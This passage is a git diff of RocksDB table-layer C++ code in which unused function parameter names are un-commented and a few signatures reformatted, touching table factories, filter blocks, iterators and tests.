diff --git a/table/adaptive_table_factory.cc b/table/adaptive_table_factory.cc index 173bca71c1b..f83905dff3a 100644 --- a/table/adaptive_table_factory.cc +++ b/table/adaptive_table_factory.cc @@ -44,7 +44,7 @@ Status AdaptiveTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size, unique_ptr<TableReader>* table, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { Footer footer; auto s = ReadFooterFromFile(file.get(), file_size, &footer); if (!s.ok()) { diff --git a/table/adaptive_table_factory.h b/table/adaptive_table_factory.h index 00af6a76e95..b7b52ba96fc 100644 --- a/table/adaptive_table_factory.h +++
b/table/adaptive_table_factory.h @@ -44,9 +44,8 @@ class AdaptiveTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/block_based_filter_block.cc b/table/block_based_filter_block.cc index a09f1a0e0af..697c11a42f0 100644 --- a/table/block_based_filter_block.cc +++ b/table/block_based_filter_block.cc @@ -113,7 +113,7 @@ inline void BlockBasedFilterBlockBuilder::AddPrefix(const Slice& key) { } } -Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, +Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); @@ -185,8 +185,8 @@ BlockBasedFilterBlockReader::BlockBasedFilterBlockReader( } bool BlockBasedFilterBlockReader::KeyMayMatch( - const Slice& key, uint64_t block_offset, const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { + const Slice& key, uint64_t block_offset, const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset != kNotValid); if (!whole_key_filtering_) { return true; @@ -195,8 +195,8 @@ bool BlockBasedFilterBlockReader::KeyMayMatch( } bool BlockBasedFilterBlockReader::PrefixMayMatch( - const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { + const Slice& prefix, uint64_t block_offset, const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset != kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index 594fd92fce1..e87def73e7e 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -209,8 +209,8 @@ class BlockBasedTableBuilder::BlockBasedTablePropertiesCollector whole_key_filtering_(whole_key_filtering), prefix_filtering_(prefix_filtering) {} - virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/, - uint64_t /*file_size*/) override { + virtual Status InternalAdd(const Slice& key, const Slice& value, + uint64_t file_size) override { // Intentionally left blank. Have no interest in collecting stats for // individual key/value pairs. 
return Status::OK(); @@ -585,7 +585,7 @@ Status BlockBasedTableBuilder::status() const { return rep_->status; } -static void DeleteCachedBlock(const Slice& /*key*/, void* value) { +static void DeleteCachedBlock(const Slice& key, void* value) { Block* block = reinterpret_cast(value); delete block; } diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index 3620db1416e..4705046bfeb 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -82,7 +82,8 @@ TableBuilder* BlockBasedTableFactory::NewTableBuilder( } Status BlockBasedTableFactory::SanitizeOptions( - const DBOptions& /*db_opts*/, const ColumnFamilyOptions& cf_opts) const { + const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const { if (table_options_.index_type == BlockBasedTableOptions::kHashSearch && cf_opts.prefix_extractor == nullptr) { return Status::InvalidArgument("Hash index is specified for block-based " diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 5ac1300789c..123e1814ab7 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -91,13 +91,13 @@ Status ReadBlockFromFile(RandomAccessFileReader* file, const Footer& footer, // Delete the resource that is held by the iterator. template -void DeleteHeldResource(void* arg, void* /*ignored*/) { +void DeleteHeldResource(void* arg, void* ignored) { delete reinterpret_cast(arg); } // Delete the entry resided in the cache. template -void DeleteCachedEntry(const Slice& /*key*/, void* value) { +void DeleteCachedEntry(const Slice& key, void* value) { auto entry = reinterpret_cast(value); delete entry; } @@ -179,8 +179,8 @@ class PartitionIndexReader : public IndexReader, public Cleanable { } // return a two-level iterator: first level is on the partition index - virtual InternalIterator* NewIterator(BlockIter* /*iter*/ = nullptr, - bool /*dont_care*/ = true) override { + virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, + bool dont_care = true) override { // Filters are already checked before seeking the index const bool skip_filters = true; const bool is_index = true; @@ -259,7 +259,7 @@ class BinarySearchIndexReader : public IndexReader { } virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, - bool /*dont_care*/ = true) override { + bool dont_care = true) override { return index_block_->NewIterator(icomparator_, iter, true); } @@ -294,7 +294,7 @@ class HashIndexReader : public IndexReader { const BlockHandle& index_handle, InternalIterator* meta_index_iter, IndexReader** index_reader, - bool /*hash_index_allow_collision*/, + bool hash_index_allow_collision, const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( @@ -941,7 +941,7 @@ Status BlockBasedTable::GetDataBlockFromCache( Status BlockBasedTable::PutDataBlockToCache( const Slice& block_cache_key, const Slice& compressed_block_cache_key, Cache* block_cache, Cache* block_cache_compressed, - const ReadOptions& /*read_options*/, const ImmutableCFOptions& ioptions, + const ReadOptions& read_options, const ImmutableCFOptions& ioptions, CachableEntry* block, Block* raw_block, uint32_t format_version, const Slice& compression_dict, size_t read_amp_bytes_per_bit, bool is_index, Cache::Priority priority) { @@ -2257,7 +2257,7 @@ void BlockBasedTable::DumpKeyValue(const Slice& key, const Slice& value, namespace { -void DeleteCachedFilterEntry(const Slice& /*key*/, void* value) { +void DeleteCachedFilterEntry(const 
Slice& key, void* value) { FilterBlockReader* filter = reinterpret_cast(value); if (filter->statistics() != nullptr) { RecordTick(filter->statistics(), BLOCK_CACHE_FILTER_BYTES_EVICT, @@ -2266,7 +2266,7 @@ void DeleteCachedFilterEntry(const Slice& /*key*/, void* value) { delete filter; } -void DeleteCachedIndexEntry(const Slice& /*key*/, void* value) { +void DeleteCachedIndexEntry(const Slice& key, void* value) { IndexReader* index_reader = reinterpret_cast(value); if (index_reader->statistics() != nullptr) { RecordTick(index_reader->statistics(), BLOCK_CACHE_INDEX_BYTES_EVICT, diff --git a/table/block_test.cc b/table/block_test.cc index 0258be4866c..f5c543975f4 100644 --- a/table/block_test.cc +++ b/table/block_test.cc @@ -133,7 +133,7 @@ TEST_F(BlockTest, SimpleTest) { BlockContents GetBlockContents(std::unique_ptr *builder, const std::vector &keys, const std::vector &values, - const int /*prefix_group_size*/ = 1) { + const int prefix_group_size = 1) { builder->reset(new BlockBuilder(1 /* restart interval */)); // Add only half of the keys diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc index dfd80c22a5a..ec282b4b540 100644 --- a/table/cuckoo_table_builder_test.cc +++ b/table/cuckoo_table_builder_test.cc @@ -23,7 +23,7 @@ namespace { std::unordered_map> hash_map; uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t /*max_num_buckets*/) { + uint64_t max_num_buckets) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/cuckoo_table_factory.cc b/table/cuckoo_table_factory.cc index 84d22468eb9..2325bcf77c4 100644 --- a/table/cuckoo_table_factory.cc +++ b/table/cuckoo_table_factory.cc @@ -16,7 +16,7 @@ Status CuckooTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, std::unique_ptr* table, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { std::unique_ptr new_reader(new CuckooTableReader( table_reader_options.ioptions, std::move(file), file_size, table_reader_options.internal_comparator.user_comparator(), nullptr)); diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h index e3371563fb5..774dc3c3e80 100644 --- a/table/cuckoo_table_factory.h +++ b/table/cuckoo_table_factory.h @@ -67,9 +67,8 @@ class CuckooTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc index 47d58753c0a..85670ad1daf 100644 --- a/table/cuckoo_table_reader.cc +++ b/table/cuckoo_table_reader.cc @@ -127,9 +127,8 @@ CuckooTableReader::CuckooTableReader( status_ = file_->Read(0, file_size, &file_data_, nullptr); } -Status CuckooTableReader::Get(const ReadOptions& /*readOptions*/, - const Slice& key, GetContext* get_context, - bool /*skip_filters*/) { +Status CuckooTableReader::Get(const ReadOptions& readOptions, const Slice& key, + GetContext* get_context, bool skip_filters) { assert(key.size() == key_length_ + (is_last_level_ ? 
8 : 0)); Slice user_key = ExtractUserKey(key); for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) { @@ -300,7 +299,7 @@ void CuckooTableIterator::Seek(const Slice& target) { PrepareKVAtCurrIdx(); } -void CuckooTableIterator::SeekForPrev(const Slice& /*target*/) { +void CuckooTableIterator::SeekForPrev(const Slice& target) { // Not supported assert(false); } @@ -365,8 +364,8 @@ extern InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena); InternalIterator* CuckooTableReader::NewIterator( - const ReadOptions& /*read_options*/, Arena* arena, - const InternalKeyComparator* /*icomp*/, bool /*skip_filters*/) { + const ReadOptions& read_options, Arena* arena, + const InternalKeyComparator* icomp, bool skip_filters) { if (!status().ok()) { return NewErrorInternalIterator( Status::Corruption("CuckooTableReader status is not okay."), arena); diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h index fdb18beb939..f2b6d1a9cfe 100644 --- a/table/cuckoo_table_reader.h +++ b/table/cuckoo_table_reader.h @@ -55,7 +55,7 @@ class CuckooTableReader: public TableReader { size_t ApproximateMemoryUsage() const override; // Following methods are not implemented for Cuckoo Table Reader - uint64_t ApproximateOffsetOf(const Slice& /*key*/) override { return 0; } + uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; } void SetupForCompaction() override {} // End of methods not implemented. diff --git a/table/cuckoo_table_reader_test.cc b/table/cuckoo_table_reader_test.cc index a012bceeb7a..7e131e56e31 100644 --- a/table/cuckoo_table_reader_test.cc +++ b/table/cuckoo_table_reader_test.cc @@ -61,7 +61,7 @@ void AddHashLookups(const std::string& s, uint64_t bucket_id, } uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t /*max_num_buckets*/) { + uint64_t max_num_buckets) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/full_filter_block.cc b/table/full_filter_block.cc index 448b827847b..5739494e8dd 100644 --- a/table/full_filter_block.cc +++ b/table/full_filter_block.cc @@ -43,8 +43,7 @@ inline void FullFilterBlockBuilder::AddPrefix(const Slice& key) { AddKey(prefix); } -Slice FullFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, - Status* status) { +Slice FullFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); if (num_added_ != 0) { @@ -75,8 +74,8 @@ FullFilterBlockReader::FullFilterBlockReader( } bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, - const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { + const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset == kNotValid); if (!whole_key_filtering_) { return true; @@ -84,9 +83,10 @@ bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, return MayMatch(key); } -bool FullFilterBlockReader::PrefixMayMatch( - const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { +bool FullFilterBlockReader::PrefixMayMatch(const Slice& prefix, + uint64_t block_offset, + const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset == kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/full_filter_block.h b/table/full_filter_block.h index e161d079e54..be27c58b61d 100644 --- a/table/full_filter_block.h +++ b/table/full_filter_block.h @@ -43,7 +43,7 @@ class FullFilterBlockBuilder : public FilterBlockBuilder { 
~FullFilterBlockBuilder() {} virtual bool IsBlockBased() override { return false; } - virtual void StartBlock(uint64_t /*block_offset*/) override {} + virtual void StartBlock(uint64_t block_offset) override {} virtual void Add(const Slice& key) override; virtual Slice Finish(const BlockHandle& tmp, Status* status) override; using FilterBlockBuilder::Finish; diff --git a/table/get_context.cc b/table/get_context.cc index aacf5d5bdf4..0d688fe4609 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -73,7 +73,7 @@ void GetContext::MarkKeyMayExist() { } } -void GetContext::SaveValue(const Slice& value, SequenceNumber /*seq*/) { +void GetContext::SaveValue(const Slice& value, SequenceNumber seq) { assert(state_ == kNotFound); appendToReplayLog(replay_log_, kTypeValue, value); diff --git a/table/index_builder.h b/table/index_builder.h index 3793cebc258..d591e0e533c 100644 --- a/table/index_builder.h +++ b/table/index_builder.h @@ -69,7 +69,7 @@ class IndexBuilder { // This method will be called whenever a key is added. The subclasses may // override OnKeyAdded() if they need to collect additional information. - virtual void OnKeyAdded(const Slice& /*key*/) {} + virtual void OnKeyAdded(const Slice& key) {} // Inform the index builder that all entries has been written. Block builder // may therefore perform any operation required for block finalization. @@ -137,7 +137,7 @@ class ShortenedIndexBuilder : public IndexBuilder { using IndexBuilder::Finish; virtual Status Finish( IndexBlocks* index_blocks, - const BlockHandle& /*last_partition_block_handle*/) override { + const BlockHandle& last_partition_block_handle) override { index_blocks->index_block_contents = index_block_builder_.Finish(); return Status::OK(); } diff --git a/table/internal_iterator.h b/table/internal_iterator.h index 3dc8f926580..2bfdb7d952a 100644 --- a/table/internal_iterator.h +++ b/table/internal_iterator.h @@ -74,8 +74,7 @@ class InternalIterator : public Cleanable { // but for Iterators that need to communicate with PinnedIteratorsManager // they will implement this function and use the passed pointer to communicate // with PinnedIteratorsManager. - virtual void SetPinnedItersMgr(PinnedIteratorsManager* /*pinned_iters_mgr*/) { - } + virtual void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {} // If true, this means that the Slice returned by key() is valid as long as // PinnedIteratorsManager::ReleasePinnedData is not called and the @@ -92,7 +91,7 @@ class InternalIterator : public Cleanable { // Iterator is not deleted. 
virtual bool IsValuePinned() const { return false; } - virtual Status GetProperty(std::string /*prop_name*/, std::string* /*prop*/) { + virtual Status GetProperty(std::string prop_name, std::string* prop) { return Status::NotSupported(""); } diff --git a/table/iterator.cc b/table/iterator.cc index 295bf8b9cfe..23a84b59e0f 100644 --- a/table/iterator.cc +++ b/table/iterator.cc @@ -98,8 +98,8 @@ class EmptyIterator : public Iterator { public: explicit EmptyIterator(const Status& s) : status_(s) { } virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& /*target*/) override {} - virtual void SeekForPrev(const Slice& /*target*/) override {} + virtual void Seek(const Slice& target) override {} + virtual void SeekForPrev(const Slice& target) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } @@ -122,8 +122,8 @@ class EmptyInternalIterator : public InternalIterator { public: explicit EmptyInternalIterator(const Status& s) : status_(s) {} virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& /*target*/) override {} - virtual void SeekForPrev(const Slice& /*target*/) override {} + virtual void Seek(const Slice& target) override {} + virtual void SeekForPrev(const Slice& target) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } diff --git a/table/mock_table.cc b/table/mock_table.cc index 4e8511031c4..4c9907e4599 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -27,14 +27,14 @@ stl_wrappers::KVMap MakeMockFile( } InternalIterator* MockTableReader::NewIterator(const ReadOptions&, - Arena* /*arena*/, + Arena* arena, const InternalKeyComparator*, - bool /*skip_filters*/) { + bool skip_filters) { return new MockTableIterator(table_); } Status MockTableReader::Get(const ReadOptions&, const Slice& key, - GetContext* get_context, bool /*skip_filters*/) { + GetContext* get_context, bool skip_filters) { std::unique_ptr iter(new MockTableIterator(table_)); for (iter->Seek(key); iter->Valid(); iter->Next()) { ParsedInternalKey parsed_key; @@ -57,10 +57,10 @@ std::shared_ptr MockTableReader::GetTableProperties() MockTableFactory::MockTableFactory() : next_id_(1) {} Status MockTableFactory::NewTableReader( - const TableReaderOptions& /*table_reader_options*/, - unique_ptr&& file, uint64_t /*file_size*/, + const TableReaderOptions& table_reader_options, + unique_ptr&& file, uint64_t file_size, unique_ptr* table_reader, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { uint32_t id = GetIDFromFile(file.get()); MutexLock lock_guard(&file_system_.mutex); @@ -76,8 +76,8 @@ Status MockTableFactory::NewTableReader( } TableBuilder* MockTableFactory::NewTableBuilder( - const TableBuilderOptions& /*table_builder_options*/, - uint32_t /*column_family_id*/, WritableFileWriter* file) const { + const TableBuilderOptions& table_builder_options, uint32_t column_family_id, + WritableFileWriter* file) const { uint32_t id = GetAndWriteNextID(file); return new MockTableBuilder(id, &file_system_); diff --git a/table/mock_table.h b/table/mock_table.h index eca85d1b26c..9e5396341c5 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -46,7 +46,7 @@ class MockTableReader : public TableReader { Status Get(const ReadOptions&, const Slice& key, GetContext* get_context, bool skip_filters = false) override; - uint64_t 
ApproximateOffsetOf(const Slice& /*key*/) override { return 0; } + uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; } virtual size_t ApproximateMemoryUsage() const override { return 0; } @@ -169,8 +169,8 @@ class MockTableFactory : public TableFactory { stl_wrappers::KVMap file_contents); virtual Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index 6a491ad9f06..2b330039e50 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -87,7 +87,7 @@ Slice PartitionedFilterBlockBuilder::Finish( PartitionedFilterBlockReader::PartitionedFilterBlockReader( const SliceTransform* prefix_extractor, bool _whole_key_filtering, - BlockContents&& contents, FilterBitsReader* /*filter_bits_reader*/, + BlockContents&& contents, FilterBitsReader* filter_bits_reader, Statistics* stats, const Comparator& comparator, const BlockBasedTable* table) : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering), diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc index 86d31a4a703..a49143dae2f 100644 --- a/table/partitioned_filter_block_test.cc +++ b/table/partitioned_filter_block_test.cc @@ -25,8 +25,8 @@ class MockedBlockBasedTable : public BlockBasedTable { explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {} virtual CachableEntry GetFilter( - const BlockHandle& filter_blk_handle, - const bool /*is_a_filter_partition*/, bool /*no_io*/) const override { + const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, + bool no_io) const override { Slice slice = slices[filter_blk_handle.offset()]; auto obj = new FullFilterBlockReader( nullptr, true, BlockContents(slice, false, kNoCompression), diff --git a/table/plain_table_factory.cc b/table/plain_table_factory.cc index 7a07de731e4..eadc2c0995f 100644 --- a/table/plain_table_factory.cc +++ b/table/plain_table_factory.cc @@ -18,7 +18,7 @@ Status PlainTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { return PlainTableReader::Open( table_reader_options.ioptions, table_reader_options.env_options, table_reader_options.internal_comparator, std::move(file), file_size, diff --git a/table/plain_table_factory.h b/table/plain_table_factory.h index 37c120a0fa6..33cd3134719 100644 --- a/table/plain_table_factory.h +++ b/table/plain_table_factory.h @@ -163,9 +163,8 @@ class PlainTableFactory : public TableFactory { static const char kValueTypeSeqId0 = char(0xFF); // Sanitizes the specified DB Options. 
- Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/plain_table_key_coding.cc b/table/plain_table_key_coding.cc index 6f5ee9b4ad2..3e87c03d13f 100644 --- a/table/plain_table_key_coding.cc +++ b/table/plain_table_key_coding.cc @@ -288,7 +288,7 @@ Status PlainTableKeyDecoder::NextPlainEncodingKey(uint32_t start_offset, ParsedInternalKey* parsed_key, Slice* internal_key, uint32_t* bytes_read, - bool* /*seekable*/) { + bool* seekable) { uint32_t user_key_size = 0; Status s; if (fixed_user_key_len_ != kPlainTableVariableLength) { diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc index 8089dcd0798..0f9449e8669 100644 --- a/table/plain_table_reader.cc +++ b/table/plain_table_reader.cc @@ -192,7 +192,7 @@ void PlainTableReader::SetupForCompaction() { InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options, Arena* arena, const InternalKeyComparator*, - bool /*skip_filters*/) { + bool skip_filters) { bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek; if (arena == nullptr) { return new PlainTableIterator(this, use_prefix_seek); @@ -537,8 +537,8 @@ void PlainTableReader::Prepare(const Slice& target) { } } -Status PlainTableReader::Get(const ReadOptions& /*ro*/, const Slice& target, - GetContext* get_context, bool /*skip_filters*/) { +Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target, + GetContext* get_context, bool skip_filters) { // Check bloom filter first. Slice prefix_slice; uint32_t prefix_hash; @@ -602,7 +602,7 @@ Status PlainTableReader::Get(const ReadOptions& /*ro*/, const Slice& target, return Status::OK(); } -uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& /*key*/) { +uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& key) { return 0; } @@ -706,7 +706,7 @@ void PlainTableIterator::Seek(const Slice& target) { } } -void PlainTableIterator::SeekForPrev(const Slice& /*target*/) { +void PlainTableIterator::SeekForPrev(const Slice& target) { assert(false); status_ = Status::NotSupported("SeekForPrev() is not supported in PlainTable"); diff --git a/table/sst_file_writer_collectors.h b/table/sst_file_writer_collectors.h index 89e0970d816..ce3a45f5a74 100644 --- a/table/sst_file_writer_collectors.h +++ b/table/sst_file_writer_collectors.h @@ -26,8 +26,8 @@ class SstFileWriterPropertiesCollector : public IntTblPropCollector { SequenceNumber global_seqno) : version_(version), global_seqno_(global_seqno) {} - virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/, - uint64_t /*file_size*/) override { + virtual Status InternalAdd(const Slice& key, const Slice& value, + uint64_t file_size) override { // Intentionally left blank. Have no interest in collecting stats for // individual key/value pairs. 
return Status::OK(); @@ -68,7 +68,7 @@ class SstFileWriterPropertiesCollectorFactory : version_(version), global_seqno_(global_seqno) {} virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t /*column_family_id*/) override { + uint32_t column_family_id) override { return new SstFileWriterPropertiesCollector(version_, global_seqno_); } diff --git a/table/table_reader.h b/table/table_reader.h index 9f137dab18d..5f47468e6de 100644 --- a/table/table_reader.h +++ b/table/table_reader.h @@ -44,7 +44,7 @@ class TableReader { bool skip_filters = false) = 0; virtual InternalIterator* NewRangeTombstoneIterator( - const ReadOptions& /*read_options*/) { + const ReadOptions& read_options) { return nullptr; } @@ -63,7 +63,7 @@ class TableReader { virtual std::shared_ptr GetTableProperties() const = 0; // Prepare work that can be done before the real Get() - virtual void Prepare(const Slice& /*target*/) {} + virtual void Prepare(const Slice& target) {} // Report an approximation of how much memory has been used. virtual size_t ApproximateMemoryUsage() const = 0; @@ -95,7 +95,7 @@ class TableReader { } // convert db file to a human readable form - virtual Status DumpTable(WritableFile* /*out_file*/) { + virtual Status DumpTable(WritableFile* out_file) { return Status::NotSupported("DumpTable() not supported"); } diff --git a/table/table_test.cc b/table/table_test.cc index a1f6a5b6e3f..c55eb425576 100644 --- a/table/table_test.cc +++ b/table/table_test.cc @@ -66,13 +66,9 @@ class DummyPropertiesCollector : public TablePropertiesCollector { public: const char* Name() const { return ""; } - Status Finish(UserCollectedProperties* /*properties*/) { - return Status::OK(); - } + Status Finish(UserCollectedProperties* properties) { return Status::OK(); } - Status Add(const Slice& /*user_key*/, const Slice& /*value*/) { - return Status::OK(); - } + Status Add(const Slice& user_key, const Slice& value) { return Status::OK(); } virtual UserCollectedProperties GetReadableProperties() const { return UserCollectedProperties{}; @@ -83,7 +79,7 @@ class DummyPropertiesCollectorFactory1 : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) { + TablePropertiesCollectorFactory::Context context) { return new DummyPropertiesCollector(); } const char* Name() const { return "DummyPropertiesCollector1"; } @@ -93,7 +89,7 @@ class DummyPropertiesCollectorFactory2 : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) { + TablePropertiesCollectorFactory::Context context) { return new DummyPropertiesCollector(); } const char* Name() const { return "DummyPropertiesCollector2"; } @@ -211,11 +207,11 @@ class BlockConstructor: public Constructor { ~BlockConstructor() { delete block_; } - virtual Status FinishImpl( - const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/, - const BlockBasedTableOptions& table_options, - const InternalKeyComparator& /*internal_comparator*/, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl(const Options& options, + const ImmutableCFOptions& ioptions, + const BlockBasedTableOptions& table_options, + const InternalKeyComparator& internal_comparator, + const stl_wrappers::KVMap& kv_map) override { delete block_; block_ = nullptr; BlockBuilder builder(table_options.block_restart_interval); @@ -309,7 +305,7 @@ class 
TableConstructor: public Constructor { virtual Status FinishImpl(const Options& options, const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& /*table_options*/, + const BlockBasedTableOptions& table_options, const InternalKeyComparator& internal_comparator, const stl_wrappers::KVMap& kv_map) override { Reset(); @@ -437,11 +433,10 @@ class MemTableConstructor: public Constructor { ~MemTableConstructor() { delete memtable_->Unref(); } - virtual Status FinishImpl( - const Options&, const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& /*table_options*/, - const InternalKeyComparator& /*internal_comparator*/, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl(const Options&, const ImmutableCFOptions& ioptions, + const BlockBasedTableOptions& table_options, + const InternalKeyComparator& internal_comparator, + const stl_wrappers::KVMap& kv_map) override { delete memtable_->Unref(); ImmutableCFOptions mem_ioptions(ioptions); memtable_ = new MemTable(internal_comparator_, mem_ioptions, @@ -504,11 +499,11 @@ class DBConstructor: public Constructor { ~DBConstructor() { delete db_; } - virtual Status FinishImpl( - const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/, - const BlockBasedTableOptions& /*table_options*/, - const InternalKeyComparator& /*internal_comparator*/, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl(const Options& options, + const ImmutableCFOptions& ioptions, + const BlockBasedTableOptions& table_options, + const InternalKeyComparator& internal_comparator, + const stl_wrappers::KVMap& kv_map) override { delete db_; db_ = nullptr; NewDB(); @@ -670,7 +665,7 @@ class FixedOrLessPrefixTransform : public SliceTransform { return Slice(src.data(), prefix_len_); } - virtual bool InDomain(const Slice& /*src*/) const override { return true; } + virtual bool InDomain(const Slice& src) const override { return true; } virtual bool InRange(const Slice& dst) const override { return (dst.size() <= prefix_len_); @@ -800,7 +795,7 @@ class HarnessTest : public testing::Test { TestRandomAccess(rnd, keys, data); } - void TestForwardScan(const std::vector& /*keys*/, + void TestForwardScan(const std::vector& keys, const stl_wrappers::KVMap& data) { InternalIterator* iter = constructor_->NewIterator(); ASSERT_TRUE(!iter->Valid()); @@ -818,7 +813,7 @@ class HarnessTest : public testing::Test { } } - void TestBackwardScan(const std::vector& /*keys*/, + void TestBackwardScan(const std::vector& keys, const stl_wrappers::KVMap& data) { InternalIterator* iter = constructor_->NewIterator(); ASSERT_TRUE(!iter->Valid()); @@ -1533,7 +1528,7 @@ static std::string RandomString(Random* rnd, int len) { } void AddInternalKey(TableConstructor* c, const std::string& prefix, - int /*suffix_len*/ = 800) { + int suffix_len = 800) { static Random rnd(1023); InternalKey k(prefix + RandomString(&rnd, 800), 0, kTypeValue); c->Add(k.Encode().ToString(), "v"); @@ -2870,7 +2865,7 @@ class TestPrefixExtractor : public rocksdb::SliceTransform { return true; } - bool InRange(const rocksdb::Slice& /*dst*/) const override { return true; } + bool InRange(const rocksdb::Slice& dst) const override { return true; } bool IsValid(const rocksdb::Slice& src) const { if (src.size() != 4) { diff --git a/third-party/fbson/FbsonDocument.h b/third-party/fbson/FbsonDocument.h index fc7ca76ff38..6fb8a93f171 100644 --- a/third-party/fbson/FbsonDocument.h +++ b/third-party/fbson/FbsonDocument.h @@ -355,7 +355,7 @@ class NumberValT : public FbsonValue { 
